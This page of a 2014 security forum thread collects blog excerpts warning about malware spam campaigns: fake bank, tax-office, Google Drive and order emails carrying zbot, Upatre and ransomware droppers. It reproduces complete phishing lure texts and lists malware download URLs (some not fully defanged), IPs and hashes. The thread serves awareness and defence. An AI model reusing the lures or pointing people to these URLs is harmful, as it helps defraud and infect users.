PDA

View Full Version : SPAM frauds, fakes, and other MALWARE deliveries...



Pages : 1 2 [3] 4 5 6

AplusWebMaster
2014-08-13, 12:18
FYI...

Fake Google drive SPAM - PDF malware
- http://myonlinesecurity.co.uk/grady-murphy-shared-google-drive3623019-73-malware/
13 Aug 2014 - "Grady Murphy shared Google Drive:3623019-73 to submit@ < your email address>.pretending to come from Grady Murphy < random name that matches the name inside the email> , Apps Team is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are several different versions of this email leading to different infection sites and links, The names of the alleged Google Drive owner who wants to share with you changes with each email. There is no attachment with this one and they want you to follow the link and download the file to infect you.
Some of the sites are
http ://energydep .net:8080/Gdrive/GDrive025384.exe
http ://bilingdepp .net:8080/Gdrive/GDrive917302.exe
Email looks like:
Accept Grady Murphy Google Drive ID:3623019-73 request clicking on the link below:
Confirm request
Unfortunately, this email is an automated notification, which is unable to receive replies. We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via google .com/support/

13 August 2014: GDrive925483.exe (40kb) Current Virus total detections: 6/54*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/28fd5d98d57d2289edfc3a327f7b9f493d4fc58c51a70cfbbd6b3474f7c65f68/analysis/1407913490/

178.238.236.109: https://www.virustotal.com/en/ip-address/178.238.236.109/information/
___

Fake PurelyGadgets SPAM - Word doc malware
- http://myonlinesecurity.co.uk/order-id-769019-purelygadgets-com-word-doc-malware-malware/
13 Aug 2013 - "Order id 769019 | PurelyGadgets .com pretending to come from a sender named inform at a random email address is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email arrives written in German language and has a zip attachment that when unzipped drops what appears to be a genuine Word Doc. BUT the Doc contains a macro that will infect you, if you use an out of date or older version of word. On previewing it, or opening it in Word 2013 ( which has macros disabled by default ) it tries to tell you to enable macros so that you can read the document. Do -not- ever -enable- macros for any Microsoft office file received by email unless you are 100% sure that you know the sender and are expecting the file... If you still use an older version of Microsoft Word, then you are at risk of being infected by this... Office 2010 and Office 2013 have macros -disabled- by default...

13 August 2014: Bestellen.zip (100 kb) : Extracts to Bestellen.Doc
Current Virus total detections: 10/54* . All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/3d53b54d98e14f9de2a2316fe09ee6b9fe27f2dacdd4ad85f52dd1e16eebb006/analysis/1407936811/
___

UK Land Registry Spam
- http://threattrack.tumblr.com/post/94637538213/uk-land-registry-spam
Aug 13, 2014 - "Subjects Seen:
Notification of direct debit of fees
Typical e-mail details:
Notification Number: 4682787
Mandate Number: LND4682787
###THIS IS AN AUTO NOTIFICATION EMAIL. DO NOT REPLY TO THE SENDER OF THIS EMAIL. IF YOU HAVE A QUERY PLEASE REFER TO THE INFORMATION BELOW ###
This is notification that Land Registry will debit 1527.00 GBP from your nominated account on or as soon as possible before 18/08/2014.
Details of fees that we shall be collecting by direct debit for the applications charged are now available to view.
You can access these by opening attached report.
If you have an enquiry relating to your VDD account please contact Customer Support at customersupport@ landregistry .gsi .gov.uk or call on 0844 892 1111. For all enquiries, please quote your key number.
Thank you,
Land Registry

Malicious File Name and MD5:
LND_Report_13082014.exe (4E3480ADAF846BE2073246C9879290D2)
LND_Report_4682787.zip (EAD6A8A2A9613175112E6C75D247B0BC)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8c26e0fcb0496b40853e9589e35632c0/tumblr_inline_na95u2Ihd01r6pupn.png

Tagged: UK Land Registry, Upatre

:fear: :mad: :sad:

AplusWebMaster
2014-08-14, 13:54
FYI...

Fake Citicorp SPAM – PDF malware
- http://myonlinesecurity.co.uk/citicorp-mail-report-attached-fake-pdf-malware/
14 Aug 2014 - "Citicorp Mail Out Report Attached pretending to come from CITICorp <random name @ citicorp .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:

From Securitas, please do not reply to this e-mail as it is auto generated.
For any problems please e-mail derry.andrews@ securitas .uk .com

14 August 2014 Q100515078_Mail Out Report.zip (9kb): Extracts to Q100229861_Mail Out Report.exe
Current Virus total detections: 3/54* . This Citicorp Mail Out Report Attached is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0875c59c8f7c69befb7dce934db7c9652614a9ad90cabc37721f56114bb026f0/analysis/1408010403/
___

Fake Charity Trends SPAM ...
- http://blog.mxlab.eu/2014/08/14/backdoor-bot-ed-attached-to-emails-with-subject-like-oder-invoice-9156230_08-xls/
Aug 14, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Oder invoice 9156230_08.xls”. This email is send from the spoofed address and has the following body:

Dear *******@*******.co.uk,
Please find attached invoice #9156230_08 from 13/08/2014.
Thanks!
Reyes Mcdaniel .
We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via hxxp ://www.charitytrends .org/ContactUs.aspx

The attached ZIP file has the name 9156230_08.zip which contains the folder Inv_3145835_453_979154.xls. In this folder the 131 kB large file Inv_3145835_453_979154.xls.scr is found. Please note that the subject line and attachment file names may change with each message.
The trojan is known as Backdoor.Bot.ED. At the time of writing, 1 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/4ac7416ea64789afabee6c7ff152cf4c552c303baef009270adca11238667bc4/analysis/1408011038/

- http://blog.mxlab.eu/2014/08/14/fake-charity-trends-email-regarding-donation-contains-trojan/
Aug 14, 2014 - "... intercept a new trojan distribution campaign by email with the subject “Thank you for your generous donation! Charity Trends .”. This email is send from the spoofed address and has the following body:

Charity Trends®
Dear *******@*******.com,
Thank you for your generous donation of 2623 GBP, which we received today.
Your generosity will make an immediate difference in the lives of many people who need your help. The funds raised will go toward them.
You will find all information about your donation in zip archive.You are making a difference!
Thanks again for your kindness,
Elsa Nash ...

The attached ZIP file has the name DON_9683272_90.zip and contains the folder DON_4356984_08_14_14. Indside this folder, the 102 kB large file DON_4356_45984_08_14_14.scr will be found. Please note that the subject line and attachment file names may change with each message. The trojan is known as Trojan/Win32.Zbot, Win32:Malware-gen, HEUR/Malware.QVM20.Gen or Mal/Generic-S... 4/54 VirusTotal*..."
* https://www.virustotal.com/en/file/3158101b5a61094a960bc3e4a17240c153efa8cbb6b1eaa26e6d2ab6c06cafe9/analysis/1408011666/
___

Fake Citibank SPAM - PDF malware
- http://myonlinesecurity.co.uk/citibank-re-account-documents-uploaded-fake-pdf-malware/
14 Aug 2014 - "'Citibank RE: Account documents' have been uploaded pretending to come from Citibank <noreply@ citibank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like"
citibank .com
RE: Account Documents
To: <REDACTED>
Case: C4055427
Your Documents have been uploaded to dropbox. In order to download / view Please click here to download / view .
All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission. Once accepted, these changes will be displayed on the public record...

14 August 2014 Document-7119.zip ; Extracts to Document-7119.scr ;
Current Virus total detections: 0/54* . This 'Citibank RE: Account documents have been uploaded' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/110dc2cdabc3ffcc924312b44e025072ec2641bf55bdcc8abdc426ddd9e8eced/analysis/1408029154/
___

ZeroLocker
- http://www.webroot.com/blog/2014/08/14/zero-locker/
Aug 14, 2014 - "... we saw FireEye and Fox-IT provide the ability to decrypt files encrypted by older crpytolocker variants. They used the command and control servers seized by the FBI during operation Tovar. Since they have access to those RSA keys they essentially have the password required for every single file encrypted by a Cryptolocker variant that used Evgeniy Bogachev’s botnet. That is a major portion of the traditional​ red GUI cryptolocker that became famous... since the emergence of their tool to decrypt files for free, there has been a new encrypting ransomware going around that aims at scamming you into thinking this is a similar helpful tool – except that it demands something all -scams- do - payment:
> https://www.webroot.com/blog/wp-content/uploads/2014/08/blograrw.bmp
This newest edition to the ever popular business model that is encrypting ransomware doesn’t really have many improvements over the others we’ve already seen. Using -Bitcoin- for payment is standard now. This variant doesn’t show the GUI untill all encryption is completed and the computer is suddenly restarted. Upon restart this window is presented and threatens that you will lose all your files if you close or remove it. The payment structure is right where industry average is – PAINFUL. This specific variant we analyzed does not delete the VSS (Volume Shadow Service) and you can get all your files back by using programs like Shadow Explorer... expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution... remember that with encrypting ransomware the best protection is going to be a good backup solution. This can be either through the cloud or offline external storage. Keeping it up to date is key so as not to lose productivity..."
___

Suspicious login message Faked, distributes Backdoor
- http://blog.trendmicro.com/trendlabs-security-intelligence/suspicious-login-message-faked-distributes-backdoor/
Aug 14, 2014 - "Legitimate services are often used by cybercriminals to try and make their attacks more convincing. Recently, I spotted attacks that used services and platforms like Google Drive and Dropbox in order to look less suspicious to unwary users. I received a spammed message like the one shown right below that supposedly came from Gmail itself. It warned me that someone logged into my account from an unknown device. However, all of the links in it pointed to a Google Drive URL:
Sample spam email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/login3.png
Even though the email message is -similar- to a legitimate Gmail message, a careful user will note that the displayed e-mail address and the supposed source address did -not- match. Further examination of the email’s headers indicates that the email was, in fact, sent via a website’s mail form... all the links provided in the email actually go to an HTML file hosted on Google Drive. This HTML file is used to detect the operating system and browser of the user... Further code also differentiates what payloads are delivered based on the user’s browser. This is what the user would see (here, running Firefox):
Fake plugin download page:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/login2.png
... while the HTML code can differentiate between different configurations, a relatively limited number of payloads are actually delivered. These are detected as BKDR_PERCS.A. This -backdoor- steals email credentials and user names and passwords. It also logs -keystrokes- as part of its information theft routines. As a backdoor, it can also accept remote commands from the attackers... The actual malicious payloads are hosted on Google Drive as well. The attackers upload new files to be used in this attack on a fairly regular basis, although the behavior remains the same... As these files are located on legitimate services, they are also sent via HTTPS, which helps evade some web filtering techniques. In addition, it used a -compromised- website’s mailer system and an IPv6 address, which can also evade email reputation services..."
(More detail at the trendmicro URL at the top.)
___

Beware of Risky Ads on Tumblr
- https://blog.malwarebytes.org/malvertising-2/2014/08/beware-of-risky-ads-on-tumblr/
Aug 14, 2014 - "Online users have come to rely on social media and social networking sites to also update them on current events and commentaries, general news, and what’s happening just down the street and around the corner. Twitter and Facebook are the first go-to sites for most when it comes to real-time news updates. For some, Tumblr.

dailynewsz[dot]tumblr[dot]com

We found the above site posting what appears as news clips but not on a daily basis, as indicated in the URL, unfortunately. According to Google Translate, the site uses both Swahili and Urdu. This site serves ads on its default page and on individual posts. So every time someone shares one, the ads are shared with it. Below is a screenshot of a post:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/dailynewsz-post.png
Online advertisement is a major source of revenue. Unfortunately, normal ads can easily become malvertisements, serving as a go-between for users and sites hosting -malicious- software. For this particular Tumblr page, it uses the ad network Yllix Media. Google Safe Browsing profiled its official website here*. Other third-party sites either blacklist** the domain or flag it as untrustworthy*** due to its history of leading users to infected sites. As of this writing, the ads are benign, but we may never know several months from now if this will still be the case... we encourage you to use ad blockers, such as AdBlock Plus (ABP) or NoScript (for Mozilla-based browsers only), if you don’t want ads to appear on sites you visit..."
* https://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=yllix.com/

** http://labs.sucuri.net/?blacklist=yllix.com

*** https://www.mywot.com/en/scorecard/yllix.com

:fear::fear: :mad:

AplusWebMaster
2014-08-15, 17:11
FYI...

Fake Barclays SPAM - Trojan.Ransom.ED
- http://blog.mxlab.eu/2014/08/15/fake-email-transaction-completed-from-barclays-contains-trojan-ransom-ed/
Aug 15, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your transaction is completed”. This email is send from the spoofed address “Barclays.NET” <support@ barclays .net>” and has the following body:
Transaction is completed. 8678 GBP has been successfully transfered.
If the transaction was made by mistake please contact our customer service.
Payment receipt is attached.
*** This is an automatically generated email, please do not reply ***
Barclays.Net 2013 Corporation. All rights reserved.

The attached ZIP file has the name Payment receipt 1534465.zip and contains the 70 kB large file Payment receipt 8821991.exe (note: file name may vary with each email). The trojan is known as Trojan.Ransom.ED or Mal/Generic-S. At the time of writing, 2 of the 54 engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/baa52d35dd98c788729f661c9c9d7b4053fcbdb3083943b9d517b83fe38063a6/analysis/1408097500/
___

Fake VOIP SPAM - Word macro script
- http://blog.mxlab.eu/2014/08/15/fake-email-from-voip-inc-installs-trojan-downloader-using-word-macro-script/
Aug 15, 2014 - "... intercepted a campaign by email with the subject “Your Order No 355253536 | Mob Inc.” which includes a malicious Word document that allows the installation of a trojan downloader using the macro functionality from Word. This email is send from the spoofed addresses and has the following body:
Thank you for ordering from VOIP Inc.
This message is to inform you that your order has been received and is currently being processed.
Your order reference is 488910845598.
You will need this in all correspondence.
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
You have chosen to pay by credit card. Your card will be charged for the amount
of 805.74 USD and “VOIP Inc.”
will appear next to the charge on your statement.
Your purchase information appears below in the file.

The attached ZIP file has the name Order.zip and contains the 41 kB large file Order.Doc. The Order.Doc is a genuine Word document but the file contains a malicious macro feature. Once opening the Word document, instructions are given on how to enable the content and activate the -malicious- macro script... The downloader is known as W97M/Downloader, MO97:Downloader-DU, VBA/TrojanDownloader.Agent.AL, Trojan-Downloader:W32/Agent.DVCR, Trojan-Downloader.VBA.Agent or Trojan.Mdropper. At the time of writing, 8 of the 53 AV engines did detect the trojan downloader at Virus Total*..."
* https://www.virustotal.com/en/file/af8694825d3d7eb470255b9dd858e6544ac54df9295bb373bc8205e8fe27722c/analysis/1408099896/

:mad: :fear::fear:

AplusWebMaster
2014-08-19, 20:06
FYI...

Fake Companies House Spam
- http://threattrack.tumblr.com/post/95187807503/companies-house-annual-return-spam
Aug 19, 2014 - "Subjects Seen:
(AR01) Annual Return received
Typical e-mail details:
Thank you for completing a submission Reference # (9586474).
(AR01) Annual Return
Your unique submission number is 9586474
Please quote this number in any communications with Companies House.
Check attachment to confirm acceptance or rejection of this filing.

Malicious File Name and MD5:
AR01_021434.scr (3324B40B5D213BEC291F9F86F0D80F64)
AR01_021434.zip (7D65D78B6E35843B6FF3C4C46BAAC37A)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/342609410f7d088e77e269adf8ed8b38/tumblr_inline_nak1zyZubX1r6pupn.png

Tagged: Companies House, Upatre
___

JPMorgan Chase Secure Message Spam
- http://threattrack.tumblr.com/post/95215399913/jpmorgan-chase-secure-message-spam
Aug 19, 2014 - "Subjects Seen:
Daily Report - August 19, 2014
Typical e-mail details:
This is a secure, encrypted message.
Desktop Users:
Open the attachment (message_zdm.html) and follow the instructions.
Mobile Users:
Voltage secure mail is not currently supported on mobile devices. If you experience issues, please access your secure message from a fully functional browser.

Malicious URLs:
192.241.124.71 /securemail/jpmchase.com/formpostdir/Java/Java_update.exe

Malicious File Name and MD5:
message_zdm.html (550CB01F07DB2363437C8627697C6B1F)
Java_update.exe (38d75db0a575891506b1ff0484a03cd0)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/332320ce00484e282636a9e2d20b0764/tumblr_inline_naklp7JVOT1r6pupn.png

192.241.124.71: https://www.virustotal.com/en/ip-address/192.241.124.71/information/

Tagged: JPMorgan, Chase, Dyreza
___

- http://myonlinesecurity.co.uk/jpmorgan-chase-co-daily-report-august-19-2014-malware/
Aug 19 2014 - "'JPMorgan Chase & Co Daily Report – August 19, 2014' pretending to come from various names at @ jpmorgan .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Daily-Report-August-19-2014.png

... the html attachment that comes with the email l0oks like the below and clicking the link hidden behind the Click to read message button leads to a fake Java_update.exe
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Daily-Report-August-19-2014_2.png
Todays Date: Java_update.exe .. Current Virus total detections: 5/53*
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/003529bb37382ad19d22b39d3295e297220c21d59418eb1b861ac3a7fb012a96/analysis/
___

Fake Evernote extension serves Ads
- https://blog.malwarebytes.org/intelligence/2014/08/fake-evernote-extension-serves-advertisements/
Aug 19, 2014 - "... a Multiplug PUP that installs a -fake- Evernote browser extension. Fellow researchers can find the link to this sample on VirusTotal here*...
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/cert_info.png
When you execute the PUP, it silently installs a web extension for the Google Chrome, Torch, and Comodo Dragon browsers. The extension takes the form of three obfuscated JavaScript files and one HTML file. The picture shows these files installed in Chrome’s extension directory on a Windows 7 PC.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/chrome_ext_files.png
... The extension that’s installed is called “Evernote Web,” just like the real extension from Evernote.com. When taking a look at the Chrome extensions page, we can see the extension installed there with the ID “lbfehkoinhhcknnbdgnnmjhiladcgbol,” just like the real Evernote Web extension.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/evernote.png
Clicking “Visit website” directs the user to the chrome webstore page for the actual Evernote Web extension. Chrome believes the real extension is installed, as verified by the Launch App button. When clicking this button with the fake extension installed, nothing happens, whereas normally the user is met with an Evernote log in screen.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/fake_evernote_chrome_store.png
On the surface, it may seem like the pop ups and advertisements are coming from the websites themselves, but are in fact from the fake Evernote web extension.
Fortunately, removing the extension is a simple task. For Chrome users, simply visit the extensions page and click the picture of a garbage can, and you’re done. You also might want to run a free scan using your Antivirus or Anti-malware programs (like Malwarebytes Anti-Malware) to make sure there wasn’t anything -else- added while you had the extension."
* https://www.virustotal.com/en/file/6a15febcf9a963a2c5122a71d690b5987f78d59b7e9bc5f28f991ce53043fbf4/analysis/
___

Fake Scotiabank SPAM – PDF malware
- http://myonlinesecurity.co.uk/scotiabank-new-instructions-international-local-transfers-fake-pdf-malware/
18 Aug 2014 - "Scotiabank New Instructions for International and local transfers pretending to come from Mallerlyn Bido <mallerlyn.bido@ scotiabank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Dear Clients
Hereby we inform you that starting next Tuesday, August 19 all instructions of local and international transfers that are sent to our institution must be completed by a transfer form specifically allocated for the purpose, which will be replacing the letter instruction tend to complete.
This new document has been implemented to meet international requirements and simultaneously control to make their operations safer.
We take this opportunity to inform you that the operations of International Transfers can be made ​​via our internet platform banking the need to complete these types of forms.
Annex find the forms that apply to transfers in USD and EUR as well as the form used for ACH transfers manuals with some notes to use as a guide to complete. These templates can be saved for you with your details for future use.(See attached file: Outgoing Global.doc Form) (See attached file: Outgoing JPM.doc Form) (See attached file: Form ACH..doc) ...
Best regards,
Mallerlyn Bido | Gerente Soporte al Cliente | BSC ...

18 August 2014: New Instructions for International and Local transfers.zip ( 8kb) :
Extracts to New Instructions for International and Local transfers.exe
Current Virus total detections: 3/52* . This Scotiabank New Instructions for International and local transfers is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2d844bbc8af9af835423ef9d862d86eac7f2f07812c0e0b263124de9e9d98b68/analysis/1408393889/

:mad: :fear:

AplusWebMaster
2014-08-20, 14:07
FYI...

Cryptolocker flogged on YouTube
- http://www.theregister.co.uk/2014/08/20/cryptolocker_flogged_on_youtube/
20 Aug 2014 - "Cryptolocker is being flogged over YouTube by vxers who have bought advertising space... researchers made the discovery while monitoring YouTube and website banners for instances where malware writers had actually purchased space to foist their wares on -unpatched- web users. The duo who will present at the upcoming Virus Bulletin 2014 conference in Seattle wrote in a paper advertisement networks was a viable way to flog virus and trojans. "We conclude that ad networks could be leveraged to aid, or even be substituted for current exploit kits," they said. Purchased ad space was a cheap and effective means of foisting browser malware allowing attackers to filter victims by language, location, and interests, VB reported. Malware contained in ads could be obfuscated and then unleashed once conditions like operating systems, browser versions and other elements were met.
> http://regmedia.co.uk/2014/08/19/tghfgh55.png
CryptoLocker surfaced in September distributed through Gameover ZeuS. It encrypted important files such as images and documents on compromised Windows machines before demanding that victim pay up to $500 in BitCoins within 72 hours for the private keys necessary to unlock files. CryptoLocker used AES symmetric cryptography to encrypt the files and encrypted the AES key with an RSA-2048 bit public key generated on its server side. It came as -malvertisers- were caught flinging malware over Yahoo! ad networks*...
> http://regmedia.co.uk/2014/08/19/fghji87y6t.png
... Many excess ad spaces were flogged through affiliates which may accept advertisements without checking the authenticity of the buyer nor the code to be run. Even those that do could end up foisting malware if they failed to detect an attackers' code alterations made after the purchase in order to quietly slip in the malware. The research pair said there was very little advertising networks could do to prevent the attacks."
* http://www.theregister.co.uk/2014/08/11/cryptowall_malvertising_yahoo_ad_network/

> https://www.virusbtn.com/conference/vb2014/abstracts/KashyapKotovNavaraj.xml
___

Fake Order SPAM – PDF malware
- http://myonlinesecurity.co.uk/order-pdf-malware/
20 Aug 2014 - "'Order – PDF' which comes as an email with a subject of order-6539-8.20.2014.pdf ( where the number is random & the date changes daily is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails have no body content and just a subject of order-6539-8.20.2014.pdf ( the number is random ) They appear to come from a load of common first names with weird characters form the second part of the alleged senders... previous post about this type of attack:
- http://myonlinesecurity.co.uk/infected-malformed-pdf-attachments-emails/
Today’s version although it pretends to be a PDF file is actually a zip file that probably either use some unknown exploit to extract it or the bad actors sending today’s malware have misconfigured the botnet sending it and it won’t automatically extract at all so users will be safe...
20 August 2014: order-6539-8.20.2014.pdf (84 kb) Extracts to order 8.20.2014.exe
Current Virus total detections for pdf is : 2/50* . Current Virus total detections for the extracted .exe : 2/53** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f84c3bb9f4dcb2961193ad4cdbcd7e882a14f0e19a5f8f68c8aa8c5bd73ba7e0/analysis/1408523288/

** https://www.virustotal.com/en/file/3e135db147e93080de32d3bc5eb27049dec5542493062cc2c7e338d901ddf559/analysis/1408523722/
___

'Reveton' ransomware adds powerful password stealer
- https://www.computerworld.com/s/article/9250503/_Reveton_ransomware_adds_powerful_password_stealer
Aug 20, 2014 - ""A type of malware called Reveton, which -falsely- warns users they've broken the law and demands payment of a fine, has been -upgraded- with powerful password stealing functions, according to Avast*. Reveton is in a class of nasty programs known as "ransomware," which includes the notorious Cryptolocker program that encrypts a computer's files. The FBI issued a warning about Reveton in August 2012 after its Internet Crime Complaint Center was flooded with complaints. The malware often infects computers via drive-by download when a person visits a website rigged to automatically exploit software vulnerabilities. Users are helpless after the computer is locked, with Reveton demanding a few hundred dollars as ransom payable various web-money services... The version of Reveton analyzed by Avast also has another password stealer from the Papras family of malware. It's not as effective as Pony but can disable security programs, the company wrote on its blog*. This particular sample of Reveton was pre-programmed to search a web browser's history and cookies to see if the user had visited online sites of 17 German banks... Around February 2013, an ethnic Russian man was arrested in Dubai upon request of Spanish police for allegedly coordinating Reveton campaigns, netting... US$1.3 million. Ten other people were also arrested on money laundering charges for allegedly laundering the proceeds and transferring funds to Russia, according to Trend Micro**."
* http://blog.avast.com/2014/08/19/reveton-ransomware-has-dangerously-evolved/

** http://blog.trendmicro.com/trendlabs-security-intelligence/key-figure-in-police-ransomware-activity-nabbed-2/
___

Linux Trojan makes the jump to Windows
- http://www.theinquirer.net/inquirer/news/2361245/chinese-linux-trojan-makes-the-jump-to-windows
Aug 20 2014 - "... the original malware known as "Linux.Dnsamp" is a Distributed Denial of Service (DDoS) Trojan, which, according to the company blog*, transfers between Linux machines, altering the startup scripts, collecting and sending machine configuration data to the hackers' server and then running silently waiting for orders. Now it appears that the same hackers have ported the Trojan to run in Windows as "Trojan.Dnsamp.1"**. The Windows version gains entry to the system under the guise of a Windows Service Test called "My Test 1". It is then saved in the system folder of the infected machine under the name "vmware-vmx.exe". When triggered, just like its Linux counterpart, the Trojan sends system information back to the hackers' central server and then awaits the signal to start a DDoS attack or start downloading other malicious programs... Although the threat of malware is an everyday hazard to most computer users, to find an attack on Linux is much rarer, and to find any kind of malware that has been ported from one operating system to another is almost unheard of... Project Shield***, an initative designed to help smaller web servers fight off DDoS attacks."
* http://news.drweb.com/show/?i=5760&c=23&lng=en&p=1

** http://news.drweb.com/show/?i=5903&lng=en&c=14

*** https://projectshield.withgoogle.com/en/

:mad::mad: :fear:

AplusWebMaster
2014-08-21, 16:30
FYI...

Tech Support SCAMS rip big brand security software with fake warnings
- https://blog.malwarebytes.org/fraud-scam/2014/08/tech-support-scammers-rip-big-brand-security-software-with-fake-warnings/
Aug 21 2014 - "... bogus tech support. If you are looking to download one of the popular antivirus or anti-malware product on the market, watch out before you click.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/listAVs-965x395.png
Lookalike pages: Fraudsters have set up -fake- download pages that look incredibly like the authentic ones... Hijacked software: Each page links to a download, which of course is -not- the actual software...
> https://blog.malwarebytes.org/wp-content/uploads/2014/07/software.png
The purpose of these fake programs is to trick people into thinking something is wrong with their computers:
> https://blog.malwarebytes.org/wp-content/uploads/2014/07/error.png
The fake pages are hosted here:
hzzzp ://onlineinstanthelp .com/antivirus-download.html
hzzzp ://onlineinstanthelp .com/norton-us/download.html
hzzzp ://onlineinstanthelp .com/mcafee-us/download.html
hzzzp ://onlineinstanthelp .com/avg-us/download.html
hzzzp ://onlineinstanthelp .com/malwarebytes-us/download.html
hzzzp ://onlineinstanthelp .com/winzip-us/download.html
hzzzp ://onlineinstanthelp .com/lavasoft-us/download.html
The company providing ‘support’ is: wefixbrowsers .com ... We are reporting the sites to the registrar and passing on the LogMeIn codes so that interested parties can take appropriate actions. To avoid these -fake- installers, users should always go to the company’s official website..."
(More detail at the malwarebytes URL at the top.)

wefixbrowsers .com / 23.91.123.204: https://www.virustotal.com/en/ip-address/23.91.123.204/information/

onlineinstanthelp .com / 118.139.186.35: https://www.virustotal.com/en/ip-address/118.139.186.35/information/
___

Fake HMRC SPAM - malware
- http://myonlinesecurity.co.uk/helping-business-onile-malware/
21 Aug 2014 - "'Helping your Business onile' pretending to come from 'HMRC Business Help and Education Emails' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Helping-your-Business-onile.png

21 August 2014 Credit_file_961529461.zip ( 50 kb)... Current Virus total detections: 1/51*
... targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/050eae9a0470d35275c74159872ddf4232430ec6890b3d411769e2622c0183f8/analysis/1408620337/
___

Fake Credit reference SPAM - word Doc malware
- http://myonlinesecurity.co.uk/re-credit-reference-file-request-108278994-fake-word-doc-malware/
21 Aug 2014 - "'RE: Credit reference file request.(108278994)' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Dear <REDACTED>
You have obtain a copy of your credit reference file.
We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 .
Lynn Buck.

21 August 2014: Credit_file_108278994.zip (52 kb): Extracts to Credit reference file.doc.scr
Current Virus total detections: 2/52*
21 August 2014: Credit_file_642094175.zip (85kb): Extracts to credit_reference_file.xls.scr
Current Virus total detections: 2/52*
This 'RE: Credit reference file request.(108278994)' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word file instead of the .scr executable file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4326821ac04b6e7d4c36093065b01e7d2ea6931818532c01a5988d2782110aaf/analysis/1408613742/
___

JPMorgan customers targeted in phishing campaign
- http://www.reuters.com/article/2014/08/21/us-cybercrime-jpmorgan-spam-idUSKBN0GL20R20140821
